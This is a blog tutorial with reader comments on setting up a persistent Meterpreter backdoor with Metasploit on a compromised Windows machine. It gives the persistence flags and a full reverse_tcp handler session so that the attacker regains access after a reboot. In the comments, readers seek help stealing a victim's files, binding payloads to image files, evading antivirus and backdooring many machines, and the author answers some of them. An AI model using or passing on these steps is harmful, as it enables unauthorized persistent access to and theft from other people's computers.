5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5


Type : Tutorial

Level : Medium, Advanced

Some people and student asking about what should we do after successfully compromising or exploiting victim?

Some exploit such as CVE-2010-3962 when executed can make victim computer hangs. When computer hangs some user choose to restart the computer and it will make the previous exploit become ineffective.

What we will do here is Maintaining Access, to leave yourself an easier way back into the system later. By using this method, if the service you exploited is down or patched, you can still gain access to the system for future use.

The Metasploit Persistent Meterpreter Service is what we will use in this tutorial, but there’s warning when you use this persistent Meterpreter as shown in this tutorial requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5 :

1. You need to set your payload of your exploit to meterpreter to do this method.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

2. run persistence -h to view help list

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address on port 8080.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Notice that the script output gives you the command to "remove" the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Let we see what happen to remote user :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

There’s established connection between attacker and remote host.

Hope it’s useful ๐Ÿ™‚

(Visited 12,420 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Kalai

    hi fren.. i having problem with compromising a win 7 machine…
    when i execute the exploit it stops at:
    [*] Started reverse handler on 
    [*] Starting the payload handler…
    and i waited for hours..but no any response.. what is the reason.. im attacking my internal network..
    here my code:
    use exploit/multi/handler
    set LHOST ( my IP)
    set LPORT 5555
    set payload windows/meterpreter/reverse_tcp
    show optios
    set EndOnSession false
    show optios
    set RHOST (target machine ip)              
    set RPORT 4321
    show options

    • v4L

      I just saw your message on facebook and also on your office live;
      handler” was use for listen every data that come to your pc on a specific port, for example you put your lhost on 5555 which mean if victim successfully compromised by your exploit, they will access your address on specific port e.g : your-ip-address:5555 it will trigger the handler.

  • Gabriel

    Hallo I need your help how can i download file like picture let say from victim computer from this pozition (meterpreter) Thank you ๐Ÿ™‚

  • r12

    what if attacker’ machine is restarted? will it be automatically reconnected? (assuming that compromised machine is always running)
    Thank you

    • v4L

      I try that on windows XP, yes it will automatically reconnect

  • Gabriel

    Let say the victim has 2 partitions C: and D: (windows 7) and i want to see what she have in computer in D: like pics, video how can i get a list with those thinks in meterpreter. Thank you very much you are great help sorry for my bad english

    • v4L

      you can share the victim folder and start search for the photo. Not from meterpreter, but you should go into Windows command line.

  • Gabriel

    and let say the victim push the exploit.exe first time and she have a rotation ip would be cool if from meterpreter to have a command to copy again reverse_tcp on startup windows so everytime she open pc to have acces. please write a line with that command if u know THANK YOU  I owe you a beer.

    • v4L

      I already wrote it above by using meterpreter

  • Gabriel

    I already wrote it above by using meterpreter
    A keyword or a link to search would be great. Thank you

  • itfun

    im just wondering, how can i deploy for many computer device around 10 to 20. can i monitoring all in the same time or ?
    Thank you.

  • Lufe

    hye there, can i backdooring out from my Lan?

    • v4L


  • Shoaib

    Sir, I am trying to install backdoor ,, it is detected as a “Trojen Dropper:VBS/Swort.A”..

    Is their any method or script exist to suucessfully install backdoor on victims computer using Backtrack 5…. without being detected by Anti-Virus..

  • Michael

    dear brother, can u tell me that what Technique I should use to bind a Payload with *.jpg or with *.bmp file. I download alot of file binders from the internet but they are not working as i want. I need a binder that can work properly & that should not change the behaviour of Payload. when Victom click my *.jpg then JPG run & payload should be execute in backgrounnd.


    • v4L

      It such a long time I didn’t use binding software, maybe you can try to find on google with “silently bind exe and image file”.

      • Michael

        Dear , I tried alot , so many softwares downloaded but no one is working fine, if we run the binded file then if it is in executeable formate then image will be open & Payload will also execute in backgroug but if the binnded file is in jpg or bmp format then only image will be display & payload will not rum

  • raja

    how can i hack victims system in wan

    • v4L


      see here http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/